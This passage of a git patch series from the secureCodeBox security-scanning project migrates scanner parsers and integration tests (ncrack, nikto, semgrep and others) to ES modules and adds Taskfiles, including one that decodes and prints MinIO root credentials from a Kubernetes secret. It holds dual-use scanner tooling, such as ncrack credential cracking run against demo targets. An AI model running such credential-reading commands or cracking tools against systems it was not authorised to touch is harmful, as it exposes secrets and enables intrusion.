@@ test( "Invalid argument should be marked as errored", async () => { await expect( - scan("cmseek-invalidArg", "cmseek", ["--invalidArg", "example.com"], 90), - ).rejects.toThrow("HTTP request failed"); + scan("cmseek-invalid-arg", "cmseek", ["--invalidArg", "example.com"], 90), + ).rejects.toThrow( + 'Scan failed with description "Failed to run the Scan Container, check k8s Job and its logs for more details"', + ); }, { timeout: 3 * 60 * 1000, From 0577fc57e11d957ec868ee4b5198a5f9b47698b7 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 14:58:38 +0200 Subject: [PATCH 065/137] Migrate kube-hunter to esm --- scanners/kube-hunter/Taskfile.yaml | 10 ++++++++++ .../kube-hunter/integration-tests/kube-hunter.test.js | 6 ++---- scanners/kube-hunter/parser/parser.js | 4 +--- scanners/kube-hunter/parser/parser.test.js | 8 +++----- 4 files changed, 16 insertions(+), 12 deletions(-) create mode 100644 scanners/kube-hunter/Taskfile.yaml diff --git a/scanners/kube-hunter/Taskfile.yaml b/scanners/kube-hunter/Taskfile.yaml new file mode 100644 index 0000000000..8ce73164eb --- /dev/null +++ b/scanners/kube-hunter/Taskfile.yaml @@ -0,0 +1,10 @@ +version: "3" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + vars: + scannerName: kube-hunter + +tasks: {} diff --git a/scanners/kube-hunter/integration-tests/kube-hunter.test.js b/scanners/kube-hunter/integration-tests/kube-hunter.test.js index fcaab8ec20..fab7d3eeb1 100644 --- a/scanners/kube-hunter/integration-tests/kube-hunter.test.js +++ b/scanners/kube-hunter/integration-tests/kube-hunter.test.js @@ -2,9 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); - -jest.retryTimes(3); +import { scan } from "../../../tests/integration/helpers.js"; test( "kube-hunter should find a fixed number of findings for the kind cluster", @@ -20,5 +18,5 @@ test( // as the number of findings will depend on the cluster, we just check if it is defined at all expect(true).toBe(true); }, - 5 * 60 * 1000, + { timeout: 5 * 60 * 1000 }, ); diff --git a/scanners/kube-hunter/parser/parser.js b/scanners/kube-hunter/parser/parser.js index 1df89ae428..4381bb1b05 100644 --- a/scanners/kube-hunter/parser/parser.js +++ b/scanners/kube-hunter/parser/parser.js @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -async function parse({ vulnerabilities = [], nodes = [] }) { +export async function parse({ vulnerabilities = [], nodes = [] }) { return vulnerabilities.map((vulnerability) => { const reference = {}; @@ -43,5 +43,3 @@ async function parse({ vulnerabilities = [], nodes = [] }) { function toValidUrl(location) { return "tcp://" + location; } - -module.exports.parse = parse; diff --git a/scanners/kube-hunter/parser/parser.test.js b/scanners/kube-hunter/parser/parser.test.js index c1544e324c..9cddcab818 100644 --- a/scanners/kube-hunter/parser/parser.test.js +++ b/scanners/kube-hunter/parser/parser.test.js @@ -2,12 +2,10 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("fs/promises"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFile } from "fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const { parse } = require("./parser"); +import { parse } from "./parser"; test("parses result from kind-1.18-in-cluster-scan correctly", async () => { const fileContent = JSON.parse( From a7f4ede4da36406ca0140da057a51620d4c30964 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 14:58:48 +0200 Subject: [PATCH 066/137] Add simple task to forward minio --- Taskfile.yaml | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/Taskfile.yaml b/Taskfile.yaml index 10487b0a23..6830baf376 100644 --- a/Taskfile.yaml +++ b/Taskfile.yaml @@ -85,3 +85,15 @@ tasks: - kind delete cluster --name testing-env status: - kind get clusters | grep -q 'testing-env' || exit 0 + + minio-port-forward: + desc: "Port forward the MinIO service to access it locally" + cmds: + - 'echo "Port forwarding MinIO service to localhost:9001"' + - 'echo "You can access MinIO at http://localhost:9001"' + - 'echo "Use the credentials from the secureCodeBox operator to log in:"' + - 'echo "Access Key: $(kubectl get secret -n securecodebox-system securecodebox-operator-minio -o jsonpath="{.data.root-user}" | base64 --decode)"' + - 'echo "Secret Key: $(kubectl get secret -n securecodebox-system securecodebox-operator-minio -o jsonpath="{.data.root-password}" | base64 --decode)"' + - 'echo "Press Ctrl+C to stop port forwarding"' + - kubectl port-forward -n securecodebox-system svc/securecodebox-operator-minio 9001:9001 + interactive: true From 44d29c60b6d9fb7a04b5da8f03abdd5b2c071a42 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 15:06:46 +0200 Subject: [PATCH 067/137] Enable kube-hunter in CI --- .github/workflows/ci.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index a47e840f97..7315967280 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -423,7 +423,7 @@ jobs: - ffuf - git-repo-scanner - gitleaks - # - kube-hunter + - kube-hunter # - ncrack # - nikto - nmap From 98852a489b12e21ce72e7ea0115387470d3a84f7 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 15:07:17 +0200 Subject: [PATCH 068/137] Migrate ncrack --- .github/workflows/ci.yaml | 2 +- scanners/ncrack/Taskfile.yaml | 16 +++++++++++ .../ncrack/integration-tests/ncrack.test.js | 6 ++-- scanners/ncrack/parser/package-lock.json | 15 +++++----- scanners/ncrack/parser/package.json | 4 +-- scanners/ncrack/parser/parser.js | 28 ++++++++----------- scanners/ncrack/parser/parser.test.js | 26 ++++++++--------- scanners/ncrack/scanner/Dockerfile | 1 - 8 files changed, 53 insertions(+), 45 deletions(-) create mode 100644 scanners/ncrack/Taskfile.yaml diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index 7315967280..f54d064576 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -424,7 +424,7 @@ jobs: - git-repo-scanner - gitleaks - kube-hunter - # - ncrack + - ncrack # - nikto - nmap - nuclei diff --git a/scanners/ncrack/Taskfile.yaml b/scanners/ncrack/Taskfile.yaml new file mode 100644 index 0000000000..f6ccf5f792 --- /dev/null +++ b/scanners/ncrack/Taskfile.yaml @@ -0,0 +1,16 @@ +version: "3" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + excludes: + - predeploy + vars: + scannerName: ncrack + +tasks: + predeploy: + deps: + - demo-targets:deploy:dummy-ssh + cmds: [] diff --git a/scanners/ncrack/integration-tests/ncrack.test.js b/scanners/ncrack/integration-tests/ncrack.test.js index f9d6b716d2..825fe6e112 100644 --- a/scanners/ncrack/integration-tests/ncrack.test.js +++ b/scanners/ncrack/integration-tests/ncrack.test.js @@ -2,9 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); - -jest.retryTimes(3); +import { scan } from "../../../tests/integration/helpers.js"; test( "ncrack should find 1 credential in vulnerable ssh service", @@ -29,5 +27,5 @@ test( high: 1, }); }, - 3 * 60 * 1000, + { timeout: 3 * 60 * 1000 }, ); diff --git a/scanners/ncrack/parser/package-lock.json b/scanners/ncrack/parser/package-lock.json index 2c2e1361dd..db99125f55 100644 --- a/scanners/ncrack/parser/package-lock.json +++ b/scanners/ncrack/parser/package-lock.json @@ -9,7 +9,7 @@ "version": "1.0.0", "license": "Apache-2.0", "dependencies": { - "xml2js": "^0.6.0" + "xml2js": "^0.6.2" }, "devDependencies": {} }, @@ -19,9 +19,10 @@ "integrity": "sha512-NqVDv9TpANUjFm0N8uM5GxL36UgKi9/atZw+x7YFnQ8ckwFGKrl4xX4yWtrey3UJm5nP1kUbnYgLopqWNSRhWw==" }, "node_modules/xml2js": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.6.0.tgz", - "integrity": "sha512-eLTh0kA8uHceqesPqSE+VvO1CDDJWMwlQfB6LuN6T8w6MaDJ8Txm8P7s5cHD0miF0V+GGTZrDQfxPZQVsur33w==", + "version": "0.6.2", + "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.6.2.tgz", + "integrity": "sha512-T4rieHaC1EXcES0Kxxj4JWgaUQHDk+qwHcYOCFHfiwKz7tOVPLq7Hjq9dM1WCMhylqMEfP7hMcOIChvotiZegA==", + "license": "MIT", "dependencies": { "sax": ">=0.6.0", "xmlbuilder": "~11.0.0" @@ -46,9 +47,9 @@ "integrity": "sha512-NqVDv9TpANUjFm0N8uM5GxL36UgKi9/atZw+x7YFnQ8ckwFGKrl4xX4yWtrey3UJm5nP1kUbnYgLopqWNSRhWw==" }, "xml2js": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.6.0.tgz", - "integrity": "sha512-eLTh0kA8uHceqesPqSE+VvO1CDDJWMwlQfB6LuN6T8w6MaDJ8Txm8P7s5cHD0miF0V+GGTZrDQfxPZQVsur33w==", + "version": "0.6.2", + "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.6.2.tgz", + "integrity": "sha512-T4rieHaC1EXcES0Kxxj4JWgaUQHDk+qwHcYOCFHfiwKz7tOVPLq7Hjq9dM1WCMhylqMEfP7hMcOIChvotiZegA==", "requires": { "sax": ">=0.6.0", "xmlbuilder": "~11.0.0" diff --git a/scanners/ncrack/parser/package.json b/scanners/ncrack/parser/package.json index 6aa8738fce..be584ac7cf 100644 --- a/scanners/ncrack/parser/package.json +++ b/scanners/ncrack/parser/package.json @@ -8,7 +8,7 @@ "author": "iteratec GmbH", "license": "Apache-2.0", "dependencies": { - "xml2js": "^0.6.0" + "xml2js": "^0.6.2" }, "devDependencies": {} -} +} \ No newline at end of file diff --git a/scanners/ncrack/parser/parser.js b/scanners/ncrack/parser/parser.js index b04c4accac..2d98d28194 100644 --- a/scanners/ncrack/parser/parser.js +++ b/scanners/ncrack/parser/parser.js @@ -2,11 +2,11 @@ // // SPDX-License-Identifier: Apache-2.0 -const xml2js = require("xml2js"); -const crypto = require("crypto"); -const { readFile } = require("fs/promises"); +import { parseString } from "xml2js"; +import { publicEncrypt, constants } from "node:crypto"; +import { readFile } from "node:fs/promises"; -async function parse( +export async function parse( fileContent, scan, encryptionKeyLocation = process.env["ENCRYPTION_KEY_LOCATION"], @@ -34,15 +34,13 @@ function transformToFindings(ncrackrun, publicKey) { let { username, password } = credential["$"]; if (publicKey) { - password = crypto - .publicEncrypt( - { - key: publicKey, - padding: crypto.constants.RSA_PKCS1_OAEP_PADDING, - }, - Buffer.from(password), - ) - .toString("base64"); + password = publicEncrypt( + { + key: publicKey, + padding: constants.RSA_PKCS1_OAEP_PADDING, + }, + Buffer.from(password), + ).toString("base64"); } return { @@ -70,7 +68,7 @@ function transformToFindings(ncrackrun, publicKey) { function transformXML(fileContent) { return new Promise((resolve, reject) => { - xml2js.parseString(fileContent, (err, xmlInput) => { + parseString(fileContent, (err, xmlInput) => { if (err) { reject(new Error("Error converting XML to JSON in xml2js: " + err)); } else { @@ -83,5 +81,3 @@ function transformXML(fileContent) { async function readPublicKey(keyLocation) { return readFile(keyLocation); } - -module.exports.parse = parse; diff --git a/scanners/ncrack/parser/parser.test.js b/scanners/ncrack/parser/parser.test.js index 42c4983d6a..aaf7006d78 100644 --- a/scanners/ncrack/parser/parser.test.js +++ b/scanners/ncrack/parser/parser.test.js @@ -2,16 +2,14 @@ // // SPDX-License-Identifier: Apache-2.0 -const { parse } = require("./parser"); -const fs = require("fs"); -const crypto = require("crypto"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFileSync } from "node:fs"; +import { privateDecrypt, constants } from "node:crypto"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; + +import { parse } from "./parser"; it("should return no findings when ncrack has not found credentials", async () => { - // eslint-disable-next-line security/detect-non-literal-fs-filename - const ncrackXML = fs.readFileSync( + const ncrackXML = readFileSync( __dirname + "/__testFiles__/ncrack_no_results.xml", { encoding: "utf8", @@ -24,7 +22,7 @@ it("should return no findings when ncrack has not found credentials", async () = it("should return findings when ncrack found credentials", async () => { // eslint-disable-next-line security/detect-non-literal-fs-filename - const ncrackXML = fs.readFileSync( + const ncrackXML = readFileSync( __dirname + "/__testFiles__/ncrack_with_results.xml", { encoding: "utf8", @@ -59,7 +57,7 @@ it("should return findings when ncrack found credentials", async () => { it("should return no findings when ncrack has not found credentials scanning two services", async () => { // eslint-disable-next-line security/detect-non-literal-fs-filename - const ncrackXML = fs.readFileSync( + const ncrackXML = readFileSync( __dirname + "/__testFiles__/ncrack_two_services_no_results.xml", { encoding: "utf8", @@ -73,7 +71,7 @@ it("should return no findings when ncrack has not found credentials scanning two it("should return findings when ncrack found two credentials scanning two services", async () => { // eslint-disable-next-line security/detect-non-literal-fs-filename - const ncrackXML = fs.readFileSync( + const ncrackXML = readFileSync( __dirname + "/__testFiles__/ncrack_two_services_with_results.xml", { encoding: "utf8", @@ -127,7 +125,7 @@ it("should return findings when ncrack found two credentials scanning two servic it("should encrypt findings when a public key is set", async () => { // eslint-disable-next-line security/detect-non-literal-fs-filename - const ncrackXML = fs.readFileSync( + const ncrackXML = readFileSync( __dirname + "/__testFiles__/ncrack_with_results.xml", { encoding: "utf8", @@ -139,10 +137,10 @@ it("should encrypt findings when a public key is set", async () => { __dirname + "/__testFiles__/public_key.pem", ); - let decryptedData = crypto.privateDecrypt( + let decryptedData = privateDecrypt( { key: privateKey, - padding: crypto.constants.RSA_PKCS1_OAEP_PADDING, + padding: constants.RSA_PKCS1_OAEP_PADDING, }, Buffer.from(finding.attributes.password, "base64"), ); diff --git a/scanners/ncrack/scanner/Dockerfile b/scanners/ncrack/scanner/Dockerfile index 5dd84fe235..991912dc24 100644 --- a/scanners/ncrack/scanner/Dockerfile +++ b/scanners/ncrack/scanner/Dockerfile @@ -12,4 +12,3 @@ RUN groupadd -g 1001 ncrack \ && useradd -M -u 1001 -g 1001 ncrack USER 1001 CMD [ "ncrack" ] - From 0ea0912b53a99ede77d055c6fa9c5d52cd6861e1 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 15:11:28 +0200 Subject: [PATCH 069/137] Update alpine version used for niko builds --- scanners/nikto/scanner/Dockerfile | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/scanners/nikto/scanner/Dockerfile b/scanners/nikto/scanner/Dockerfile index 9e0e587941..014a48e45a 100644 --- a/scanners/nikto/scanner/Dockerfile +++ b/scanners/nikto/scanner/Dockerfile @@ -2,12 +2,12 @@ # # SPDX-License-Identifier: Apache-2.0 -FROM alpine:3.14 AS build +FROM alpine:3.22 AS build ARG scannerVersion RUN apk add git RUN git clone --depth 1 https://github.com/sullo/nikto.git /nikto -FROM alpine:3.14 +FROM alpine:3.22 ENV PATH=${PATH}:/nikto @@ -21,6 +21,6 @@ RUN apk add --update --no-cache --virtual .build-deps \ COPY --from=build --chown=nikto:nikto /nikto/program /nikto -USER 1001 +USER 1001 ENTRYPOINT [ "sh", "/wrapper.sh" ] From 9a6b6f12cdc94a9063ee34722b79442624352ea0 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 15:15:07 +0200 Subject: [PATCH 070/137] Migrate nikto to ESM --- .github/workflows/ci.yaml | 2 +- scanners/nikto/Taskfile.yaml | 16 +++++++++ .../nikto/integration-tests/nikto.test.js | 4 +-- scanners/nikto/parser/parser.js | 13 ++++--- scanners/nikto/parser/parser.test.js | 36 ++++++++++--------- 5 files changed, 45 insertions(+), 26 deletions(-) create mode 100644 scanners/nikto/Taskfile.yaml diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index f54d064576..a5624ec942 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -425,7 +425,7 @@ jobs: - gitleaks - kube-hunter - ncrack - # - nikto + - nikto - nmap - nuclei # - screenshooter diff --git a/scanners/nikto/Taskfile.yaml b/scanners/nikto/Taskfile.yaml new file mode 100644 index 0000000000..2444e2ee95 --- /dev/null +++ b/scanners/nikto/Taskfile.yaml @@ -0,0 +1,16 @@ +version: "3" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + excludes: + - predeploy + vars: + scannerName: nikto + +tasks: + predeploy: + deps: + - demo-targets:deploy:bodgeit + cmds: [] diff --git a/scanners/nikto/integration-tests/nikto.test.js b/scanners/nikto/integration-tests/nikto.test.js index 5e56351f35..4e8521ef7d 100644 --- a/scanners/nikto/integration-tests/nikto.test.js +++ b/scanners/nikto/integration-tests/nikto.test.js @@ -2,9 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); - -jest.retryTimes(3); +import { scan } from "../../../tests/integration/helpers.js"; test( "nikto scan against bodgeit demo-target", diff --git a/scanners/nikto/parser/parser.js b/scanners/nikto/parser/parser.js index 7c7da0c7bd..85379d30bb 100644 --- a/scanners/nikto/parser/parser.js +++ b/scanners/nikto/parser/parser.js @@ -41,10 +41,15 @@ function categorize({ id }) { return ["Nikto Finding", INFORMATIONAL]; } -async function parse(niktoReport) { - if (!niktoReport) return []; +export async function parse(fileContent) { + if (!fileContent) return []; - return niktoReport.flatMap( + const report = JSON.parse(fileContent); + if (!report || !report.length) { + return []; + } + + return report.flatMap( ({ host, ip, port: portString, banner, vulnerabilities }) => { const port = parseInt(portString, 10); @@ -104,5 +109,3 @@ async function parse(niktoReport) { }, ); } - -module.exports.parse = parse; diff --git a/scanners/nikto/parser/parser.test.js b/scanners/nikto/parser/parser.test.js index 16691fbdc8..bf1737d27c 100644 --- a/scanners/nikto/parser/parser.test.js +++ b/scanners/nikto/parser/parser.test.js @@ -2,18 +2,17 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("fs/promises"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFile } from "fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const { parse } = require("./parser"); +import { parse } from "./parser"; test("parses www.securecodebox.io result file into findings", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/docs.securecodebox.io.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/docs.securecodebox.io.json", + { encoding: "utf8", - }), + }, ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -21,10 +20,11 @@ test("parses www.securecodebox.io result file into findings", async () => { }); test("parses OWASP Juice Shop result file into findings", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/juice-shop.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/juice-shop.json", + { encoding: "utf8", - }), + }, ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -32,10 +32,11 @@ test("parses OWASP Juice Shop result file into findings", async () => { }); test("should properly parse empty json file", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/empty-report.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/empty-report.json", + { encoding: "utf8", - }), + }, ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -43,10 +44,11 @@ test("should properly parse empty json file", async () => { }); test("parses 'no web server found' finding correctly", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/unresolvable-host.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/unresolvable-host.json", + { encoding: "utf8", - }), + }, ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); From 8dcdfb6074c66c965940f11e463adcf986c743a0 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 15:31:14 +0200 Subject: [PATCH 071/137] Migrate screenshooter --- .github/workflows/ci.yaml | 2 +- scanners/screenshooter/Taskfile.yaml | 16 ++++++++++++++++ .../integration-tests/screenshooter.test.js | 5 ++--- scanners/screenshooter/parser/package-lock.json | 14 -------------- .../parser/package-lock.json.license | 3 --- scanners/screenshooter/parser/package.json | 11 ----------- .../screenshooter/parser/package.json.license | 3 --- scanners/screenshooter/parser/parser.js | 4 +--- scanners/screenshooter/parser/parser.test.js | 6 ++---- 9 files changed, 22 insertions(+), 42 deletions(-) create mode 100644 scanners/screenshooter/Taskfile.yaml delete mode 100644 scanners/screenshooter/parser/package-lock.json delete mode 100644 scanners/screenshooter/parser/package-lock.json.license delete mode 100644 scanners/screenshooter/parser/package.json delete mode 100644 scanners/screenshooter/parser/package.json.license diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index a5624ec942..7e6b08d2fd 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -428,7 +428,7 @@ jobs: - nikto - nmap - nuclei - # - screenshooter + - screenshooter # - semgrep # - ssh-audit # - sslyze diff --git a/scanners/screenshooter/Taskfile.yaml b/scanners/screenshooter/Taskfile.yaml new file mode 100644 index 0000000000..5c4c5ea30c --- /dev/null +++ b/scanners/screenshooter/Taskfile.yaml @@ -0,0 +1,16 @@ +version: "3" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + excludes: + - predeploy + vars: + scannerName: screenshooter + +tasks: + predeploy: + deps: + - demo-targets:deploy:nginx + cmds: [] diff --git a/scanners/screenshooter/integration-tests/screenshooter.test.js b/scanners/screenshooter/integration-tests/screenshooter.test.js index 8dca93dff3..53ad6c300e 100644 --- a/scanners/screenshooter/integration-tests/screenshooter.test.js +++ b/scanners/screenshooter/integration-tests/screenshooter.test.js @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); +import { scan } from "../../../tests/integration/helpers.js"; test( "make screenshot of nginx demo target", @@ -16,6 +16,5 @@ test( expect(categories).toEqual({ Screenshot: 1 }); }, - 60 * 1000, + { timeout: 60 * 1000 }, ); -2; diff --git a/scanners/screenshooter/parser/package-lock.json b/scanners/screenshooter/parser/package-lock.json deleted file mode 100644 index acf9b084b8..0000000000 --- a/scanners/screenshooter/parser/package-lock.json +++ /dev/null @@ -1,14 +0,0 @@ -{ - "name": "@securecodebox/parser-screenshooter", - "version": "1.0.0", - "lockfileVersion": 2, - "requires": true, - "packages": { - "": { - "name": "@securecodebox/parser-screenshooter", - "version": "1.0.0", - "license": "Apache-2.0", - "devDependencies": {} - } - } -} diff --git a/scanners/screenshooter/parser/package-lock.json.license b/scanners/screenshooter/parser/package-lock.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/scanners/screenshooter/parser/package-lock.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/scanners/screenshooter/parser/package.json b/scanners/screenshooter/parser/package.json deleted file mode 100644 index 4292c15b2a..0000000000 --- a/scanners/screenshooter/parser/package.json +++ /dev/null @@ -1,11 +0,0 @@ -{ - "name": "@securecodebox/parser-screenshooter", - "version": "1.0.0", - "description": "Parses result files for the type: 'screenshot-png'.", - "main": "", - "scripts": {}, - "keywords": [], - "author": "iteratec GmbH", - "license": "Apache-2.0", - "devDependencies": {} -} diff --git a/scanners/screenshooter/parser/package.json.license b/scanners/screenshooter/parser/package.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/scanners/screenshooter/parser/package.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/scanners/screenshooter/parser/parser.js b/scanners/screenshooter/parser/parser.js index 9b82ae8881..df64f452af 100644 --- a/scanners/screenshooter/parser/parser.js +++ b/scanners/screenshooter/parser/parser.js @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -async function parse(image, scan) { +export async function parse(image, scan) { if (image.length === 0) { return []; } @@ -24,5 +24,3 @@ async function parse(image, scan) { }, ]; } - -module.exports.parse = parse; diff --git a/scanners/screenshooter/parser/parser.test.js b/scanners/screenshooter/parser/parser.test.js index eceb2be2b6..dceabb9798 100644 --- a/scanners/screenshooter/parser/parser.test.js +++ b/scanners/screenshooter/parser/parser.test.js @@ -2,10 +2,8 @@ // // SPDX-License-Identifier: Apache-2.0 -const { parse } = require("./parser"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { parse } from "./parser"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; let scan; From 0eac1c1af439431ab69021105f0b9930889a7f2a Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 15:35:05 +0200 Subject: [PATCH 072/137] Migrate semgrep to esm --- .github/workflows/ci.yaml | 2 +- scanners/semgrep/Taskfile.yaml | 15 ++++++++++++++ .../semgrep/integration-tests/semgrep.test.js | 6 ++---- scanners/semgrep/parser/parser.js | 13 ++++++++---- scanners/semgrep/parser/parser.test.js | 20 +++++++++---------- 5 files changed, 36 insertions(+), 20 deletions(-) create mode 100644 scanners/semgrep/Taskfile.yaml diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index 7e6b08d2fd..e7436affee 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -429,7 +429,7 @@ jobs: - nmap - nuclei - screenshooter - # - semgrep + - semgrep # - ssh-audit # - sslyze # - trivy diff --git a/scanners/semgrep/Taskfile.yaml b/scanners/semgrep/Taskfile.yaml new file mode 100644 index 0000000000..ab2a109d37 --- /dev/null +++ b/scanners/semgrep/Taskfile.yaml @@ -0,0 +1,15 @@ +version: "3" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + excludes: + - predeploy + vars: + scannerName: semgrep + +tasks: + predeploy: + cmds: + - kubectl -n integration-tests create configmap semgrep-test-file --from-file=integration-tests/testfile.py diff --git a/scanners/semgrep/integration-tests/semgrep.test.js b/scanners/semgrep/integration-tests/semgrep.test.js index 2855aafb39..7958084b64 100644 --- a/scanners/semgrep/integration-tests/semgrep.test.js +++ b/scanners/semgrep/integration-tests/semgrep.test.js @@ -2,9 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); - -jest.retryTimes(0); +import { scan } from "../../../tests/integration/helpers.js"; test( "semgrep should find 3 issues in the test file", @@ -42,7 +40,7 @@ test( high: 3, }); }, - 3 * 60 * 1000, + { timeout: 3 * 60 * 1000 }, ); /* Disable this rule as it requires access to the Internet and clones a public GitHub repo diff --git a/scanners/semgrep/parser/parser.js b/scanners/semgrep/parser/parser.js index 3ac4404f18..c652f02a37 100644 --- a/scanners/semgrep/parser/parser.js +++ b/scanners/semgrep/parser/parser.js @@ -7,8 +7,15 @@ const severityMap = new Map([ ["warning", "MEDIUM"], ["error", "HIGH"], ]); -async function parse(fileContent) { - return fileContent.results.flatMap((result) => { + +export async function parse(fileContent) { + const report = JSON.parse(fileContent); + + if (!report || !report.results) { + return []; + } + + return report.results.flatMap((result) => { // Assemble location as path to file and line range const location = result.path + ":" + result.start.line + "-" + result.end.line; @@ -78,5 +85,3 @@ async function parse(fileContent) { }; }); } - -module.exports.parse = parse; diff --git a/scanners/semgrep/parser/parser.test.js b/scanners/semgrep/parser/parser.test.js index 7fa79166ba..97c0e3b40a 100644 --- a/scanners/semgrep/parser/parser.test.js +++ b/scanners/semgrep/parser/parser.test.js @@ -2,21 +2,19 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("fs/promises"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFile } from "node:fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const { parse } = require("./parser"); +import { parse } from "./parser"; test("should properly parse file from inline semgrep usage", async () => { - const jsonContent = await readFile( + const fileContent = await readFile( __dirname + "/__testFiles__/minimal-metadata.json", { encoding: "utf8", }, ); - const findings = await parse(JSON.parse(jsonContent)); + const findings = await parse(fileContent); // validate findings await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchInlineSnapshot(` @@ -39,13 +37,13 @@ test("should properly parse file from inline semgrep usage", async () => { }); test("should properly parse file with a single result", async () => { - const jsonContent = await readFile( + const fileContent = await readFile( __dirname + "/__testFiles__/python-injection.json", { encoding: "utf8", }, ); - const findings = await parse(JSON.parse(jsonContent)); + const findings = await parse(fileContent); // validate findings await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchInlineSnapshot(` @@ -81,13 +79,13 @@ test("should properly parse file with a single result", async () => { }); test("should properly parse file with multiple results", async () => { - const jsonContent = await readFile( + const fileContent = await readFile( __dirname + "/__testFiles__/python-injection-multiresult.json", { encoding: "utf8", }, ); - const findings = await parse(JSON.parse(jsonContent)); + const findings = await parse(fileContent); // validate findings await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchInlineSnapshot(` From 900817fb3d0b0e852d5f7bb91c870825c904ceae Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 15:40:45 +0200 Subject: [PATCH 073/137] Migrate ssh-audit to esm --- .github/workflows/ci.yaml | 2 +- scanners/ssh-audit/Taskfile.yaml | 16 +++++++++ .../integration-tests/ssh-audit.test.js | 8 ++--- scanners/ssh-audit/parser/parser.js | 36 ++++++++++--------- scanners/ssh-audit/parser/parser.test.js | 27 +++++--------- scanners/ssh-audit/scanner/Dockerfile | 2 +- 6 files changed, 50 insertions(+), 41 deletions(-) create mode 100644 scanners/ssh-audit/Taskfile.yaml diff --git a/.github/workflows/ci.yaml 